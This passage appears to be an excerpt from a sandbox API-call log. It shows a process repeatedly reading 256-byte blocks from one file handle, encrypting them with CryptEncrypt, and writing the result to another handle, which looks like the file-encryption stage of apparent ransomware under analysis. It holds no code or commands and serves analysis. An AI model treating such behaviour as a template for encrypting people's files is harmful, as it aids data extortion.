pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.036] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.036] GetLastError () returned 0x0 [0173.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.037] GetLastError () returned 0x0 [0173.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.037] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.038] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.038] GetLastError () returned 0x0 [0173.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.039] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.039] GetLastError () returned 0x0 [0173.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.040] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.040] GetLastError () returned 0x0 [0173.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.040] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.040] GetLastError () returned 0x0 [0173.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.040] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.040] GetLastError () returned 0x0 [0173.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.040] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.040] GetLastError () returned 0x0 [0173.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.040] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.040] GetLastError () returned 0x0 [0173.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 